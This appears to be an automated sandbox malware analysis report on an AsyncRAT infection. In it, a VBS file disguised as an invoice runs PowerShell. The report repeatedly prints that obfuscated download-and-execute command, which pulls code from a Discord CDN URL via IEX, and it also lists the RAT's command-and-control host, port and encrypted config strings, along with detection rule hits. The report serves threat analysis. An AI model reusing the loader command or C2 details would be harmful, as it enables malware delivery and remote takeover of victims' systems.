{"Server": "ahmed2611.linkpc.net", "Port": "6666", "Version": "0.5.7B", "MutexName": "AsyncMutex_6SI8OkPnk", "Autorun": "false", "Group": "Default"}
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\invoice.vbs', ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5616, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, ProcessId: 6080 |
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\invoice.vbs', ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5616, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, ProcessId: 6080 |
Source: 0000000B.00000002.728657057.0000000003451000.00000004.00000001.sdmp | Malware Configuration Extractor: AsyncRAT {"Server": "ahmed2611.linkpc.net", "Port": "6666", "Version": "0.5.7B", "MutexName": "AsyncMutex_6SI8OkPnk", "Autorun": "false", "Group": "Default"} |
Source: 11.2.aspnet_compiler.exe.400000.0.unpack | Avira: Label: TR/Dropper.Gen |
Source: unknown | HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49722 version: TLS 1.0 |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.282275640.0000019FCDDE0000.00000004.00000001.sdmp |
Source: | Binary string: Console.pdb source: powershell.exe, 00000003.00000002.264815805.0000019FB5840000.00000004.00000001.sdmp |
Source: Malware configuration extractor | URLs: ahmed2611.linkpc.net |
Source: Joe Sandbox View | IP Address: 162.159.130.233 162.159.130.233 |
Source: Joe Sandbox View | IP Address: 162.159.130.233 162.159.130.233 |
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad |
Source: unknown | HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49722 version: TLS 1.0 |
Source: unknown | DNS traffic detected: queries for: cdn.discordapp.com |
Source: powershell.exe, 00000003.00000002.264676521.0000019FB5741000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/CloudflareIncRSACA-2.crt0 |
Source: powershell.exe, 00000003.00000002.264636885.0000019FB5709000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000003.00000002.282168154.0000019FCDD54000.00000004.00000001.sdmp | String found in binary or memory: http://crl.microsof |
Source: powershell.exe, 00000003.00000002.264676521.0000019FB5741000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/CloudflareIncRSACA-2.crl07 |
Source: powershell.exe, 00000003.00000002.282233519.0000019FCDD9D000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m |
Source: powershell.exe, 00000003.00000002.264676521.0000019FB5741000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/CloudflareIncRSACA-2.crl0 |
Source: powershell.exe, 00000003.00000002.264765066.0000019FB57BC000.00000004.00000001.sdmp | String found in binary or memory: http://csoft.com/pki/crls/MicRooCerAut_2 |
Source: powershell.exe, 00000003.00000002.278475153.0000019FC5932000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000003.00000002.264676521.0000019FB5741000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0 |
Source: powershell.exe, 00000003.00000002.282233519.0000019FCDD9D000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0: |
Source: powershell.exe, 00000003.00000002.266551043.0000019FB5AE8000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.267222634.0000019FB5CC0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000003.00000002.264881794.0000019FB58D1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000003.00000002.267222634.0000019FB5CC0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000003.00000002.266551043.0000019FB5AE8000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.264676521.0000019FB5741000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com/CPS0v |
Source: powershell.exe, 00000003.00000002.276154584.0000019FB6AB4000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.267222634.0000019FB5CC0000.00000004.00000001.sdmp, Run.vbs.3.dr | String found in binary or memory: https://cdn.discordapp.com/attachments/833416270924742669/869658269294137374/dola2020.txt |
Source: PowerShell_transcript.019635.jcVtHXYn.20210803225606.txt.3.dr | String found in binary or memory: https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt |
Source: powershell.exe, 00000003.00000002.267222634.0000019FB5CC0000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.discordapp.comx |
Source: powershell.exe, 00000003.00000002.278475153.0000019FC5932000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000003.00000002.278475153.0000019FC5932000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000003.00000002.278475153.0000019FC5932000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000003.00000002.266551043.0000019FB5AE8000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000003.216141533.0000019FB73B7000.00000004.00000001.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.278475153.0000019FC5932000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000003.00000002.267222634.0000019FB5CC0000.00000004.00000001.sdmp | String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct |
Source: powershell.exe, 00000003.00000002.282233519.0000019FCDD9D000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722 |
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729 |
Source: Yara match | File source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.2.powershell.exe.19fb5fc3208.8.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.2.powershell.exe.19fb67b2de0.7.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.2.powershell.exe.19fb67b2de0.7.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.2.powershell.exe.19fb5fc3208.8.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000003.00000002.275049815.0000019FB696D000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000002.268623513.0000019FB5FBA000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000B.00000002.726757646.0000000000402000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6080, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 4652, type: MEMORYSTR |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX'); | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX'); | Jump to behavior |
Source: invoice.vbs | Initial sample: Strings found which are bigger than 50 |
Source: 00000001.00000002.201434500.000002777ABB5000.00000004.00000020.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score = |
Source: 00000001.00000002.202016822.000002777C910000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score = |
Source: 00000001.00000003.200969823.000002777ACDB000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score = |
Source: 00000001.00000002.201502033.000002777ACD5000.00000004.00000040.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score = |
Source: 11.2.aspnet_compiler.exe.400000.0.unpack, Client/Settings.cs | Base64 encoded string: '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 |